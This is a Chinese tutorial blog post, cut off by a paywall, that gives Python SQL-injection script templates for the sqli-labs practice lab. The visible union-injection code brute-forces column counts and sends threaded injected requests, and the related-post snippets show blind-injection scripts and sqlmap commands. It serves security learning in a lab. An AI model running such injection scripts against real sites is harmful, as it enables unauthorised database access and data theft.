python脚本模板(用于sqli-labs实验)

最新推荐文章于 2021-12-05 00:51:48 发布
最新推荐文章于 2021-12-05 00:51:48 发布
阅读量404 收藏 4
点赞数 1
分类专栏: sqli-labs python SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42529356/article/details/113799221
版权
本文提供了一系列Python脚本模板,包括UNION联合注入、error报错注入、bool布尔注入和time延时盲注,适用于SQL注入实验。还包含了一个探测SQL注入前缀的脚本,为安全测试提供了便利。
摘要由CSDN通过智能技术生成

目录

UNION联合注入 python脚本模板

import requests
import threading
import queue
from lxml import etree
import re




NUM=5  #线程数
LIST=[]
headers = {
   'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'}
def bypass(payload):
    '''


    :param payload:
    :return:
    '''
    if payload:
    	 if 'order' not in payload:
            payload+=' limit {},1'
        payload = "' "+payload  # 添加前缀
        payload += " --+"  # 添加后缀


    return payload


def brute_field_num(url):
    '''
    暴力测试数据表的字段数
    :param url:
    :return: 数据表的字段数
    '''
    try:
        n=1
        while True:
            payload=url+bypass(" order by {}".format(n))
            print(payload)
            res=requests.get(payload,headers=headers)
            if  'Unknown column' in res.text:
                return n-1
            n+=1
    except Exception as e:
        print(e)



class UnionSql(threading.Thread):
    def __init__(self,url,xpath,q):
        self.url=url
        self.xpath=xpath
        self.q=q
        super().__init__()




    def run(self):
        global LIST
        headers={
   'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0'}




        str1 = ''
        n=self.q.get()
        payload=self.url.format(n)
        # print(payload)
        res=requests.get(payload,headers=headers).text
        html=etree.HTML(res)
        text=html.xpath(self.xpath)
        LIST.append(text)


def main(url,xpath):

    q = queue.Queue()
    thread_list = []
    for n in range(NUM):
        q.put(n)
    for n in range(NUM)<
最低0.47元/天 解锁文章
鑫达达
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
python编写sqli-labs11关脚本
willow_liang的博客
11-03 318
关于sql时间盲注爆破数据库名 未使用二分法 import requests import datetime headers = { "User - Agent": "Mozilla / 5.0(Windows NT 6.1;Win64;x64;rv: 82.0) Gecko / 20100101Firefox / 82.0" } def main(): database = "" for n in range(1,9): for i in rang
sqli-lab简单python实现通关
Williu的博客
01-04 3364
刚开始学习sql注入的菜鸟,简单写下自己的理解,sql注入,肯定和数据库有关系了。利用sql语句来实现对数据库的入侵并获取数据或者破坏。 简单来说就是,利用sql语句来实现欺骗服务器,达到自己的目的。 比如: 我们要登录,需要输入用户名个和密码,然后后台数据库就会select SELECT * FROM users WHERE username = '张三' AND password = '123456' 然后我们改变他的查询方式,利用#或许–注释符 select * from users where u
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名和密码没有正确对应,修改后的代码我又上传了,抱歉,,,)
Sqlilabs Post_Blind_Injection python脚本
baynk的博客
03-05 433
每天花点时间写,弄了好几天才弄完,但还是觉得比较简单的,最后对数据的处理没有做成表格的形式,然后也不会设置成类似sqlmap可以使用-u这种方法,继续学习吧。 #!/usr/bin/env python #coding:utf-8 #author:baynk import requests #求长度的二分法 def length_two(payload): min = 0 m...
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs实验环境
05-08
`sqli-labs`是一个专门用于学习和实践SQL注入实验环境,它提供了多种类型的SQL注入漏洞场景,包括但不限于盲注、时间延迟注入、宽字节注入联合查询注入等。通过这些实验,初学者可以深入了解SQL注入的原理,掌握...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
Python黑客攻防(五)sqli-labs环境搭建
qq_43681532的博客
07-16 435
准备 phpstudy: phpStudy是一个PHP调试环境的程序集成包。该程序包集成许多的环境,一次性即可安装,无须配置即可使用,是非常方便、好用的PHP调试环境。 链接:https://wwe.lanzous.com/b01bjh6di 密码: hp2i sqli-labs: Sqli-labs是一个印度程序员写的,用来学习练习sql注入的一个注入靶场。 链接:https://wwe.lanzous.com/b01bji8yh 密码:f3xj 步骤 1.phpstudy安装完成后,把PHP版本改为
sqli-labs靶场第九关
gou1791241251的博客
12-26 1528
传入id=1参数进行查看 传入单引号和双引号进行测试闭合方式 传入单引号时页面没反应,试一下双引号 还是没有反应!!!此时应该反应过来,可能页面没有布尔类型状态,只能尝试一下绝招(绝境才能用的招)延时注入 此时发现确实延迟了十秒页面才能正常响应,延时注入是布尔盲注的一种,如果条件正确就沉睡10秒,秒数可以自己自定义。 以下就不演示怎么获取数据库信息了,参考sqli-labs第六关的盲注,把条件换成沉睡10秒即可。 ...
【针对sqli-labs第9关的时间盲注python脚本
AA8j的博客
09-09 720
效果图 源码 #!/usr/bin/python # -*- coding: utf-8 -*- # @Time : 2021/9/7 10:20 # @Author : AA8j # @Site : # @File : Time-based-blind-SQL-injection.py # @Software: PyCharm # @Blog : https://blog.csdn.net/qq_44874645 import binascii import request
联合注入的 一些小心得
微笑的孤狼
12-08 287
一、 1、首先贴一个参考博客https://blog.csdn.net/u012763794/article/details/51207833 2、关于联合注入的很多细节博客中已经提及,这里只是说一下所需要的一些步骤 注:以下实验来自bugku 中ctf中的成绩单一题 二、首先判断数据库中是字符型或者是数字型。 (1)使用单引号,双引号判断,id=1'或者id=1" (2)数字回显比如...
sqlilabs教程(1-10)
热门推荐
一个安全研究员
04-18 3万+
前言 最近在研究sql注入,只是看书有点无聊(不推荐大家去看《sql注入攻击与防御》,这本书的翻译很奇怪,而且内容不太适合小白,可以当小说看) less-1 根据提示,可以知道只是个单引号注入的题目,我们在参数后面加一个单引号看下效果: 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被...
sql-labs第八关python脚本
西部壮仔的博客
03-22 1055
sql bool盲注 代码如下: # 1. 设置全局变量DIS 和list用于控制详细信息的显示以及定义需要爆破的ASCII码 # 2. 爆破当前数据库长度 # 3. 定义数据库长度爆破函数Brute_length() # 4. 爆破当前数据库名称 # 5. 定义数据库名爆破函数Brute_database() # 6. 爆破所有数据库长度 # 7. 爆破所有数据库名称 # 8. 爆破表名 # 9...
SQL注入sqlmap爆破sqli-labs-master
龙乐的专栏
08-23 9880
sqlmap是一款爆破mysql数据的神器。这里我用sqlmap来演示爆破sqli-labs-master的数据库。 GET型的sqlmap爆破。 1.枚举数据库:Python sqlmay.py -u http://localhost/sqli-labs-master/Less-5/?id=1 –dbs; 2.列出数据库中数据表:python sqlmap.py -u http://loc
自动SQL注入 -使用python编写SQL注入【一.检测注入类型】
qq_40591440的博客
11-21 1678
前言: 使用 SQLlib 当目标靶机: 检测实现的原理 注入有很多种有基于返回信息的注入,基于返回的报错注入,基于页面显示的注入,基于时间的注入 本次主要检测注入类型 手动检测 下面手动演示 Union联合注入 在自动检测的时候尽量先手动的进行检测报错以确认目标闭合的条件和是否可进行返回等信息 如下图所示输入 id=1 是正常显示 当输入 id=1'的时候会进行保存 ''1'' LIMIT 0,1'是时候可以对报错信息进行拆分 拆分流程 ''1'' LIMIT 0,1' #首先去掉两边的 单引号 '
sqli-lab(1-10)及函数扩充
quan9i的博客
12-05 413
文章目录常用函数扩充sql-lab1-4获取字段数获取数据库名获取表名获取字段信息sql-lab 5-7获取字段数获取数据库名sql-lib 8-10 常用函数扩充 下面部分函数之前已扩充,点击此处查看 在此继续扩充一些需要用到的函数 1、left()函数 解释:left(a,b)从左侧截取a的前b位,正确则返回1,错误则返回0 示例如下 代码:left(database(),1)=’s’ 结果如下 2、regexp函数 解释:user的结果是root(我的账号为root),regexp为匹配root的正则
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值